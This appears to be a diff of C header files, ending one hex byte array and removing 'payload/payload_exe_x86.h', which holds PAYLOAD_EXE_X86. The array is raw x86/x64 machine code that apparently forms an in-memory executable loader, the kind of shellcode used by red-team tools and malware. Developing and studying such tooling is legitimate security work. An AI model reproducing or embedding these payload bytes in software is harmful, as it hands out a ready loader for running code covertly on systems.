1245 0xb6, 0x10, 0x48, 0x89, 0xf0, 0x48, 0x8d, 0x70, 0x01, 0x0f, 0xb6, 0x00,
1246 0x38, 0xc2, 0x74, 0x20, 0x48, 0x8d, 0x43, 0xff, 0x0f, 0xb6, 0x10, 0x48,
1247 0x8d, 0x46, 0xff, 0x0f, 0xb6, 0x00, 0x38, 0xc2, 0x73, 0x07, 0xb8, 0xff,
1248 0xff, 0xff, 0xff, 0xeb, 0x1d, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xeb, 0x16,
1249 0x48, 0x8b, 0x45, 0x30, 0x48, 0x8d, 0x50, 0xff, 0x48, 0x89, 0x55, 0x30,
1250 0x48, 0x85, 0xc0, 0x75, 0xb7, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5b, 0x5e,
1251 0x5d, 0xc3, 0x90, 0x90, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x30,
1252 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x18,
1253 0x48, 0x89, 0x45, 0xd8, 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00, 0x00, 0xeb,
1254 0x1f, 0x8b, 0x45, 0xfc, 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00,
1255 0x48, 0x8b, 0x45, 0x10, 0x48, 0x01, 0xd0, 0x8b, 0x10, 0x8b, 0x45, 0xfc,
1256 0x89, 0x54, 0x85, 0xe0, 0x83, 0x45, 0xfc, 0x01, 0x83, 0x7d, 0xfc, 0x03,
1257 0x76, 0xdb, 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x5e, 0x8b,
1258 0x45, 0xd8, 0xc1, 0xc8, 0x08, 0x89, 0xc2, 0x8b, 0x45, 0xdc, 0x01, 0xc2,
1259 0x8b, 0x45, 0xe0, 0x31, 0xd0, 0x89, 0x45, 0xd8, 0x8b, 0x45, 0xdc, 0xc1,
1260 0xc0, 0x03, 0x89, 0xc2, 0x8b, 0x45, 0xd8, 0x31, 0xd0, 0x89, 0x45, 0xdc,
1261 0x8b, 0x45, 0xec, 0x89, 0x45, 0xf8, 0x8b, 0x45, 0xe4, 0xc1, 0xc8, 0x08,
1262 0x89, 0xc2, 0x8b, 0x45, 0xe0, 0x01, 0xd0, 0x33, 0x45, 0xfc, 0x89, 0x45,
1263 0xec, 0x8b, 0x45, 0xe0, 0xc1, 0xc0, 0x03, 0x89, 0xc2, 0x8b, 0x45, 0xec,
1264 0x31, 0xd0, 0x89, 0x45, 0xe0, 0x8b, 0x45, 0xe8, 0x89, 0x45, 0xe4, 0x8b,
1265 0x45, 0xf8, 0x89, 0x45, 0xe8, 0x83, 0x45, 0xfc, 0x01, 0x83, 0x7d, 0xfc,
1266 0x1a, 0x76, 0x9c, 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x83, 0xc4, 0x30, 0x5d,
1267 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x50, 0x48, 0x89, 0x4d,
1268 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45,
1269 0xe0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x89, 0x45, 0xf8, 0xc7, 0x45, 0xf0,
1270 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf4, 0x00, 0x00, 0x00, 0x00, 0xc7,
1271 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xc9, 0x00, 0x00, 0x00, 0x8b,
1272 0x55, 0xf4, 0x48, 0x8b, 0x45, 0xe0, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00,
1273 0x84, 0xc0, 0x74, 0x06, 0x83, 0x7d, 0xf4, 0x40, 0x75, 0x73, 0xb8, 0x10,
1274 0x00, 0x00, 0x00, 0x2b, 0x45, 0xf0, 0x89, 0xc1, 0x48, 0x8d, 0x55, 0xd0,
1275 0x8b, 0x45, 0xf0, 0x48, 0x01, 0xd0, 0x49, 0x89, 0xc8, 0xba, 0x00, 0x00,
1276 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0xbe, 0xfd, 0xff, 0xff, 0x8b, 0x45,
1277 0xf0, 0xc6, 0x44, 0x05, 0xd0, 0x80, 0x83, 0x7d, 0xf0, 0x0b, 0x76, 0x2b,
1278 0x48, 0x8b, 0x55, 0xf8, 0x48, 0x8d, 0x45, 0xd0, 0x48, 0x89, 0xc1, 0xe8,
1279 0xb0, 0xfe, 0xff, 0xff, 0x48, 0x31, 0x45, 0xf8, 0x48, 0x8d, 0x45, 0xd0,
1280 0x41, 0xb8, 0x10, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48,
1281 0x89, 0xc1, 0xe8, 0x85, 0xfd, 0xff, 0xff, 0x8b, 0x45, 0xf4, 0xc1, 0xe0,
1282 0x03, 0x89, 0x45, 0xdc, 0xc7, 0x45, 0xf0, 0x10, 0x00, 0x00, 0x00, 0x83,
1283 0x45, 0xec, 0x01, 0xeb, 0x1e, 0x8b, 0x55, 0xf4, 0x48, 0x8b, 0x45, 0xe0,
1284 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x89, 0xc2, 0x8b, 0x45, 0xf0, 0x88,
1285 0x54, 0x05, 0xd0, 0x83, 0x45, 0xf0, 0x01, 0x83, 0x45, 0xf4, 0x01, 0x83,
1286 0x7d, 0xf0, 0x10, 0x75, 0x1b, 0x48, 0x8b, 0x55, 0xf8, 0x48, 0x8d, 0x45,
1287 0xd0, 0x48, 0x89, 0xc1, 0xe8, 0x4b, 0xfe, 0xff, 0xff, 0x48, 0x31, 0x45,
1288 0xf8, 0xc7, 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00, 0x83, 0x7d, 0xec, 0x00,
1289 0x0f, 0x84, 0x2d, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x83,
1290 0xc4, 0x50, 0x5d, 0xc3, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
1291 0x90, 0x90, 0x90, 0x90, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20,
1292 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x18,
1293 0x48, 0x89, 0x45, 0xf0, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xe8,
1294 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x42, 0x8b, 0x45, 0xfc,
1295 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xf0,
1296 0x48, 0x01, 0xd0, 0x8b, 0x55, 0xfc, 0x48, 0x8d, 0x0c, 0x95, 0x00, 0x00,
1297 0x00, 0x00, 0x48, 0x8b, 0x55, 0xf0, 0x48, 0x01, 0xca, 0x8b, 0x0a, 0x8b,
1298 0x55, 0xfc, 0x4c, 0x8d, 0x04, 0x95, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b,
1299 0x55, 0xe8, 0x4c, 0x01, 0xc2, 0x8b, 0x12, 0x31, 0xca, 0x89, 0x10, 0x83,
1300 0x45, 0xfc, 0x01, 0x83, 0x7d, 0xfc, 0x03, 0x76, 0xb8, 0xc7, 0x45, 0xfc,
1301 0x00, 0x00, 0x00, 0x00, 0xe9, 0x1c, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45,
1302 0xf0, 0x8b, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x04, 0x8b,
1303 0x00, 0x01, 0xc2, 0x48, 0x8b, 0x45, 0xf0, 0x89, 0x10, 0x48, 0x8b, 0x45,
1304 0xf0, 0x48, 0x8d, 0x50, 0x04, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0,
1305 0x04, 0x8b, 0x00, 0xc1, 0xc0, 0x05, 0x89, 0xc1, 0x48, 0x8b, 0x45, 0xf0,
1306 0x8b, 0x00, 0x31, 0xc8, 0x89, 0x02, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83,
1307 0xc0, 0x08, 0x48, 0x8b, 0x55, 0xf0, 0x48, 0x83, 0xc2, 0x08, 0x8b, 0x0a,
1308 0x48, 0x8b, 0x55, 0xf0, 0x48, 0x83, 0xc2, 0x0c, 0x8b, 0x12, 0x01, 0xca,
1309 0x89, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x0c, 0x48, 0x8b,
1310 0x55, 0xf0, 0x48, 0x83, 0xc2, 0x0c, 0x8b, 0x12, 0x89, 0xd1, 0xc1, 0xc1,
1311 0x08, 0x48, 0x8b, 0x55, 0xf0, 0x48, 0x83, 0xc2, 0x08, 0x8b, 0x12, 0x31,
1312 0xca, 0x89, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x08, 0x48,
1313 0x8b, 0x55, 0xf0, 0x48, 0x83, 0xc2, 0x08, 0x8b, 0x0a, 0x48, 0x8b, 0x55,
1314 0xf0, 0x48, 0x83, 0xc2, 0x04, 0x8b, 0x12, 0x01, 0xca, 0x89, 0x10, 0x48,
1315 0x8b, 0x45, 0xf0, 0x8b, 0x00, 0xc1, 0xc0, 0x10, 0x89, 0xc2, 0x48, 0x8b,
1316 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x0c, 0x8b, 0x00, 0x01, 0xc2, 0x48, 0x8b,
1317 0x45, 0xf0, 0x89, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x8d, 0x50, 0x0c,
1318 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x0c, 0x8b, 0x00, 0xc1, 0xc0,
1319 0x0d, 0x89, 0xc1, 0x48, 0x8b, 0x45, 0xf0, 0x8b, 0x00, 0x31, 0xc8, 0x89,
1320 0x02, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x04, 0x48, 0x8b, 0x55,
1321 0xf0, 0x48, 0x83, 0xc2, 0x04, 0x8b, 0x12, 0x89, 0xd1, 0xc1, 0xc1, 0x07,
1322 0x48, 0x8b, 0x55, 0xf0, 0x48, 0x83, 0xc2, 0x08, 0x8b, 0x12, 0x31, 0xca,
1323 0x89, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x08, 0x48, 0x8b,
1324 0x55, 0xf0, 0x48, 0x83, 0xc2, 0x08, 0x8b, 0x12, 0xc1, 0xc2, 0x10, 0x89,
1325 0x10, 0x83, 0x45, 0xfc, 0x01, 0x83, 0x7d, 0xfc, 0x0f, 0x0f, 0x86, 0xda,
1326 0xfe, 0xff, 0xff, 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x42,
1327 0x8b, 0x45, 0xfc, 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48,
1328 0x8b, 0x45, 0xf0, 0x48, 0x01, 0xd0, 0x8b, 0x55, 0xfc, 0x48, 0x8d, 0x0c,
1329 0x95, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xf0, 0x48, 0x01, 0xca,
1330 0x8b, 0x0a, 0x8b, 0x55, 0xfc, 0x4c, 0x8d, 0x04, 0x95, 0x00, 0x00, 0x00,
1331 0x00, 0x48, 0x8b, 0x55, 0xe8, 0x4c, 0x01, 0xc2, 0x8b, 0x12, 0x31, 0xca,
1332 0x89, 0x10, 0x83, 0x45, 0xfc, 0x01, 0x83, 0x7d, 0xfc, 0x03, 0x76, 0xb8,
1333 0x90, 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48,
1334 0x83, 0xec, 0x50, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c,
1335 0x89, 0x45, 0x20, 0x4c, 0x89, 0x4d, 0x28, 0x48, 0x8b, 0x45, 0x20, 0x48,
1336 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x89, 0x45, 0xe8, 0xe9,
1337 0xd4, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf4, 0x00, 0x00, 0x00, 0x00, 0xeb,
1338 0x1d, 0x8b, 0x45, 0xf4, 0x48, 0x63, 0xd0, 0x48, 0x8b, 0x45, 0xe8, 0x48,
1339 0x01, 0xd0, 0x0f, 0xb6, 0x10, 0x8b, 0x45, 0xf4, 0x48, 0x98, 0x88, 0x54,
1340 0x05, 0xd0, 0x83, 0x45, 0xf4, 0x01, 0x83, 0x7d, 0xf4, 0x0f, 0x7e, 0xdd,
1341 0x48, 0x8d, 0x45, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x4d, 0x10, 0xe8,
1342 0x9c, 0xfd, 0xff, 0xff, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x48, 0x83, 0x7d,
1343 0x28, 0x10, 0x48, 0x0f, 0x46, 0x45, 0x28, 0x89, 0x45, 0xe4, 0xc7, 0x45,
1344 0xf4, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x2f, 0x8b, 0x45, 0xf4, 0x48, 0x63,
1345 0xd0, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x01, 0xc2, 0x8b, 0x45, 0xf4, 0x48,
1346 0x63, 0xc8, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x01, 0xc8, 0x0f, 0xb6, 0x08,
1347 0x8b, 0x45, 0xf4, 0x48, 0x98, 0x0f, 0xb6, 0x44, 0x05, 0xd0, 0x31, 0xc8,
1348 0x88, 0x02, 0x83, 0x45, 0xf4, 0x01, 0x8b, 0x45, 0xf4, 0x3b, 0x45, 0xe4,
1349 0x7c, 0xc9, 0x8b, 0x45, 0xe4, 0x48, 0x98, 0x48, 0x29, 0x45, 0x28, 0x8b,
1350 0x45, 0xe4, 0x48, 0x98, 0x48, 0x01, 0x45, 0xf8, 0xc7, 0x45, 0xf4, 0x10,
1351 0x00, 0x00, 0x00, 0xeb, 0x25, 0x8b, 0x45, 0xf4, 0x48, 0x98, 0x48, 0x8d,
1352 0x50, 0xff, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x10,
1353 0x83, 0xc2, 0x01, 0x88, 0x10, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74, 0x02,
1354 0xeb, 0x0a, 0x83, 0x6d, 0xf4, 0x01, 0x83, 0x7d, 0xf4, 0x00, 0x7f, 0xd5,
1355 0x48, 0x83, 0x7d, 0x28, 0x00, 0x0f, 0x85, 0x21, 0xff, 0xff, 0xff, 0x90,
1356 0x48, 0x83, 0xc4, 0x50, 0x5d, 0xc3, 0x90, 0x90, 0xff, 0xff, 0xff, 0xff,
1357 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
1358 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00,
1359 0x00, 0x00, 0x00, 0x00};
1360
+0
-638
payload/payload_exe_x86.h less more
0
1 unsigned char PAYLOAD_EXE_X86[] = {
2 0x83, 0xec, 0x20, 0x53, 0x55, 0x56, 0x57, 0x8b, 0x7c, 0x24, 0x34, 0xff,
3 0x77, 0x2c, 0xff, 0x77, 0x28, 0xff, 0x77, 0x4c, 0xff, 0x77, 0x48, 0x57,
4 0xe8, 0xd1, 0x1a, 0x00, 0x00, 0xff, 0x77, 0x2c, 0x8b, 0xf0, 0xff, 0x77,
5 0x28, 0xff, 0x77, 0x54, 0xff, 0x77, 0x50, 0x57, 0xe8, 0xbd, 0x1a, 0x00,
6 0x00, 0x83, 0xc4, 0x28, 0x8b, 0xd8, 0x89, 0x5c, 0x24, 0x34, 0x85, 0xf6,
7 0x0f, 0x84, 0x15, 0x02, 0x00, 0x00, 0x85, 0xdb, 0x0f, 0x84, 0x0d, 0x02,
8 0x00, 0x00, 0x6a, 0x04, 0x68, 0x00, 0x30, 0x00, 0x00, 0xff, 0x37, 0x6a,
9 0x00, 0xff, 0xd6, 0x8b, 0xf0, 0x85, 0xf6, 0x0f, 0x84, 0xf6, 0x01, 0x00,
10 0x00, 0xff, 0x37, 0x57, 0x56, 0xe8, 0x17, 0x1d, 0x00, 0x00, 0x6a, 0x20,
11 0x8d, 0x44, 0x24, 0x20, 0x6a, 0x00, 0x50, 0xe8, 0x2d, 0x1d, 0x00, 0x00,
12 0x8b, 0x06, 0x8d, 0xae, 0x30, 0x02, 0x00, 0x00, 0x2d, 0x30, 0x02, 0x00,
13 0x00, 0x50, 0x55, 0x8d, 0x46, 0x14, 0x50, 0x8d, 0x46, 0x04, 0x50, 0xe8,
14 0xec, 0x1b, 0x00, 0x00, 0xff, 0x76, 0x2c, 0x8d, 0x86, 0x18, 0x06, 0x00,
15 0x00, 0xff, 0x76, 0x28, 0x50, 0xe8, 0xb5, 0x1a, 0x00, 0x00, 0x83, 0xc4,
16 0x34, 0x3b, 0x86, 0x18, 0x07, 0x00, 0x00, 0x0f, 0x85, 0x4f, 0x01, 0x00,
17 0x00, 0x3b, 0x96, 0x1c, 0x07, 0x00, 0x00, 0x0f, 0x85, 0x43, 0x01, 0x00,
18 0x00, 0xff, 0x76, 0x2c, 0xff, 0x76, 0x28, 0xff, 0x76, 0x34, 0xff, 0x76,
19 0x30, 0x56, 0xe8, 0x1b, 0x1a, 0x00, 0x00, 0x83, 0xc4, 0x14, 0x89, 0x46,
20 0x30, 0x85, 0xc0, 0x0f, 0x84, 0x76, 0x01, 0x00, 0x00, 0x33, 0xff, 0x39,
21 0xbe, 0x34, 0x02, 0x00, 0x00, 0x76, 0x16, 0x8d, 0x9e, 0x38, 0x02, 0x00,
22 0x00, 0x53, 0xff, 0x56, 0x30, 0x47, 0x83, 0xc3, 0x20, 0x3b, 0xbe, 0x34,
23 0x02, 0x00, 0x00, 0x72, 0xf0, 0x33, 0xdb, 0x43, 0x39, 0x5d, 0x00, 0x76,
24 0x34, 0x8d, 0x6e, 0x34, 0x8d, 0x7e, 0x38, 0xff, 0x76, 0x2c, 0xff, 0x76,
25 0x28, 0xff, 0x77, 0x04, 0xff, 0x37, 0x56, 0xe8, 0xce, 0x19, 0x00, 0x00,
26 0x83, 0xc4, 0x14, 0x89, 0x45, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0xd2, 0x00,
27 0x00, 0x00, 0x43, 0x83, 0xc7, 0x08, 0x83, 0xc5, 0x04, 0x3b, 0x9e, 0x30,
28 0x02, 0x00, 0x00, 0x72, 0xd2, 0x8b, 0x86, 0x0c, 0x05, 0x00, 0x00, 0x6a,
29 0x02, 0x5b, 0x3b, 0xc3, 0x75, 0x15, 0x56, 0xe8, 0x29, 0x05, 0x00, 0x00,
30 0x59, 0x85, 0xc0, 0x0f, 0x84, 0xa7, 0x00, 0x00, 0x00, 0x8b, 0x86, 0x0c,
31 0x05, 0x00, 0x00, 0x8d, 0xbe, 0x48, 0x07, 0x00, 0x00, 0x83, 0xf8, 0x01,
32 0x74, 0x02, 0x8b, 0x3f, 0x83, 0xbe, 0x40, 0x03, 0x00, 0x00, 0x01, 0x74,
33 0x26, 0x56, 0xe8, 0x32, 0x03, 0x00, 0x00, 0x59, 0x85, 0xc0, 0x75, 0x08,
34 0x39, 0x9e, 0x40, 0x03, 0x00, 0x00, 0x74, 0x78, 0x56, 0xe8, 0x05, 0x04,
35 0x00, 0x00, 0x59, 0x85, 0xc0, 0x75, 0x08, 0x39, 0x9e, 0x40, 0x03, 0x00,
36 0x00, 0x74, 0x65, 0x83, 0x3f, 0x03, 0x74, 0x59, 0x83, 0x3f, 0x04, 0x74,
37 0x54, 0x83, 0x3f, 0x01, 0x74, 0x23, 0x39, 0x1f, 0x74, 0x1f, 0x83, 0x3f,
38 0x05, 0x74, 0x12, 0x83, 0x3f, 0x06, 0x74, 0x0d, 0x83, 0x3f, 0x07, 0x75,
39 0x43, 0x56, 0xe8, 0xe5, 0x17, 0x00, 0x00, 0xeb, 0x3a, 0x56, 0xe8, 0x4c,
40 0x16, 0x00, 0x00, 0xeb, 0x32, 0x8d, 0x44, 0x24, 0x10, 0x50, 0x56, 0xe8,
41 0xe7, 0x0c, 0x00, 0x00, 0x59, 0x59, 0x85, 0xc0, 0x74, 0x0d, 0x8d, 0x44,
42 0x24, 0x10, 0x50, 0x56, 0xe8, 0xe1, 0x0e, 0x00, 0x00, 0x59, 0x59, 0x8d,
43 0x44, 0x24, 0x10, 0x50, 0x56, 0xe8, 0x5d, 0x08, 0x00, 0x00, 0x59, 0xeb,
44 0x06, 0x56, 0xe8, 0x91, 0x11, 0x00, 0x00, 0x59, 0x8b, 0x5c, 0x24, 0x34,
45 0x83, 0xbe, 0x0c, 0x05, 0x00, 0x00, 0x02, 0xbf, 0x00, 0xc0, 0x00, 0x00,
46 0x75, 0x2e, 0x8b, 0x86, 0x48, 0x07, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x24,
47 0xff, 0xb6, 0x40, 0x07, 0x00, 0x00, 0x6a, 0x00, 0x50, 0xe8, 0x7b, 0x1b,
48 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x57, 0x6a, 0x00, 0xff, 0xb6, 0x48, 0x07,
49 0x00, 0x00, 0xff, 0x56, 0x40, 0x83, 0xa6, 0x48, 0x07, 0x00, 0x00, 0x00,
50 0xff, 0x36, 0x6a, 0x00, 0x56, 0xe8, 0x5b, 0x1b, 0x00, 0x00, 0x83, 0xc4,
51 0x0c, 0x57, 0x6a, 0x00, 0x56, 0xff, 0xd3, 0x33, 0xc0, 0xeb, 0x03, 0x83,
52 0xc8, 0xff, 0x5f, 0x5e, 0x5d, 0x5b, 0x83, 0xc4, 0x20, 0xc3, 0x8b, 0x44,
53 0x24, 0x04, 0x83, 0xc0, 0x04, 0xf0, 0xff, 0x00, 0x8b, 0x00, 0xc2, 0x04,
54 0x00, 0x33, 0xc0, 0xc2, 0x08, 0x00, 0x55, 0x8b, 0xec, 0xf6, 0x45, 0x10,
55 0x02, 0x56, 0x8b, 0x75, 0x08, 0x57, 0x74, 0x15, 0x8b, 0x7d, 0x18, 0x85,
56 0xff, 0x74, 0x1b, 0x8b, 0x46, 0x14, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x04,
57 0x8b, 0x46, 0x14, 0x89, 0x07, 0xf6, 0x45, 0x10, 0x01, 0x74, 0x19, 0x8b,
58 0x7d, 0x14, 0x85, 0xff, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb,
59 0x0d, 0x83, 0xc6, 0x0c, 0x56, 0x8b, 0x06, 0xff, 0x50, 0x04, 0x89, 0x37,
60 0x33, 0xc0, 0x5f, 0x5e, 0x5d, 0xc2, 0x14, 0x00, 0x8b, 0x44, 0x24, 0x04,
61 0x8b, 0x40, 0x28, 0xff, 0x50, 0x54, 0x8b, 0x4c, 0x24, 0x08, 0x89, 0x01,
62 0x33, 0xc0, 0xc2, 0x08, 0x00, 0x56, 0x57, 0xe8, 0x08, 0x18, 0x00, 0x00,
63 0x8b, 0x74, 0x24, 0x10, 0xb9, 0x13, 0x14, 0x40, 0x00, 0xbf, 0xe4, 0x2a,
64 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x08, 0xe8, 0xed,
65 0x17, 0x00, 0x00, 0xb9, 0x62, 0x12, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8,
66 0x8b, 0x06, 0x89, 0x48, 0x04, 0xe8, 0xda, 0x17, 0x00, 0x00, 0xb9, 0x72,
67 0x14, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x08,
68 0xe8, 0xc7, 0x17, 0x00, 0x00, 0xb9, 0xc0, 0x12, 0x40, 0x00, 0x2b, 0xcf,
69 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x0c, 0xe8, 0xb4, 0x17, 0x00, 0x00,
70 0xb9, 0x76, 0x12, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89,
71 0x48, 0x10, 0xe8, 0xa1, 0x17, 0x00, 0x00, 0xb9, 0x71, 0x12, 0x40, 0x00,
72 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x14, 0xe8, 0x8e, 0x17,
73 0x00, 0x00, 0xb9, 0x0e, 0x14, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b,
74 0x06, 0x89, 0x48, 0x18, 0xe8, 0x7b, 0x17, 0x00, 0x00, 0xb9, 0x71, 0x12,
75 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x1c, 0xe8,
76 0x68, 0x17, 0x00, 0x00, 0xb9, 0xc3, 0x13, 0x40, 0x00, 0x2b, 0xcf, 0x03,
77 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x20, 0xe8, 0x55, 0x17, 0x00, 0x00, 0xb9,
78 0xbe, 0x13, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48,
79 0x24, 0xe8, 0x42, 0x17, 0x00, 0x00, 0xb9, 0xbe, 0x13, 0x40, 0x00, 0x2b,
80 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x5f, 0x89, 0x48, 0x28, 0x8b, 0x44, 0x24,
81 0x08, 0x83, 0x66, 0x04, 0x00, 0x89, 0x46, 0x28, 0x5e, 0xc3, 0x33, 0xc0,
82 0xc2, 0x04, 0x00, 0x55, 0x8b, 0xec, 0x83, 0xec, 0x2c, 0x33, 0xc0, 0x56,
83 0x6a, 0x20, 0x50, 0x89, 0x45, 0xf4, 0x89, 0x45, 0xf8, 0x89, 0x45, 0xfc,
84 0x8d, 0x45, 0xd4, 0x50, 0xe8, 0xc4, 0x19, 0x00, 0x00, 0x8b, 0x75, 0x0c,
85 0x8d, 0x4d, 0xd4, 0x83, 0xc4, 0x0c, 0x8b, 0x06, 0x51, 0x56, 0xff, 0x50,
86 0x0c, 0x85, 0xc0, 0x75, 0x12, 0x8b, 0x06, 0x8d, 0x4d, 0xfc, 0x51, 0x8d,
87 0x4d, 0xf8, 0x51, 0x8d, 0x4d, 0xf4, 0x51, 0x56, 0xff, 0x50, 0x10, 0x33,
88 0xc0, 0x5e, 0xc9, 0xc2, 0x08, 0x00, 0x33, 0xc0, 0xc2, 0x0c, 0x00, 0x8b,
89 0x4c, 0x24, 0x0c, 0x85, 0xc9, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80,
90 0xeb, 0x4d, 0x53, 0x8b, 0x5c, 0x24, 0x0c, 0x33, 0xd2, 0x56, 0x8b, 0x74,
91 0x24, 0x0c, 0x57, 0x8b, 0x7e, 0x28, 0x8b, 0x84, 0x97, 0xfc, 0x03, 0x00,
92 0x00, 0x3b, 0x04, 0x93, 0x75, 0x08, 0x42, 0x83, 0xfa, 0x04, 0x75, 0xee,
93 0xeb, 0x14, 0x33, 0xd2, 0x8b, 0x84, 0x97, 0xac, 0x04, 0x00, 0x00, 0x3b,
94 0x04, 0x93, 0x75, 0x10, 0x42, 0x83, 0xfa, 0x04, 0x75, 0xee, 0x89, 0x31,
95 0xf0, 0xff, 0x46, 0x04, 0x33, 0xc0, 0xeb, 0x08, 0x83, 0x21, 0x00, 0xb8,
96 0x02, 0x40, 0x00, 0x80, 0x5f, 0x5e, 0x5b, 0xc2, 0x0c, 0x00, 0x8b, 0x4c,
97 0x24, 0x04, 0x83, 0xc8, 0xff, 0xf0, 0x0f, 0xc1, 0x41, 0x04, 0x48, 0xc2,
98 0x04, 0x00, 0x8b, 0x44, 0x24, 0x18, 0x83, 0x20, 0x00, 0x33, 0xc0, 0xc2,
99 0x18, 0x00, 0x8b, 0x44, 0x24, 0x04, 0x0f, 0xaf, 0x44, 0x24, 0x08, 0xc3,
100 0x8b, 0x44, 0x24, 0x14, 0x83, 0x20, 0x00, 0x33, 0xc0, 0xc2, 0x14, 0x00,
101 0x8b, 0x44, 0x24, 0x04, 0x03, 0x44, 0x24, 0x08, 0xc3, 0x51, 0x53, 0x56,
102 0x8b, 0x74, 0x24, 0x10, 0x8d, 0x86, 0x38, 0x03, 0x00, 0x00, 0x50, 0xff,
103 0x56, 0x30, 0x8b, 0xd8, 0x85, 0xdb, 0x75, 0x06, 0x40, 0xe9, 0xc5, 0x00,
104 0x00, 0x00, 0x55, 0x57, 0x8d, 0x86, 0xac, 0x03, 0x00, 0x00, 0x50, 0x53,
105 0xff, 0x56, 0x34, 0x8b, 0xe8, 0x85, 0xed, 0x0f, 0x84, 0xaa, 0x00, 0x00,
106 0x00, 0xbf, 0x8e, 0x14, 0x40, 0x00, 0x81, 0xef, 0x82, 0x14, 0x40, 0x00,
107 0x0f, 0x88, 0x99, 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x18, 0x50, 0x6a,
108 0x40, 0x57, 0x55, 0xff, 0x56, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0x85, 0x00,
109 0x00, 0x00, 0x57, 0xe8, 0xd8, 0x15, 0x00, 0x00, 0xb9, 0x82, 0x14, 0x40,
110 0x00, 0x81, 0xe9, 0xe4, 0x2a, 0x40, 0x00, 0x03, 0xc1, 0x50, 0x55, 0xe8,
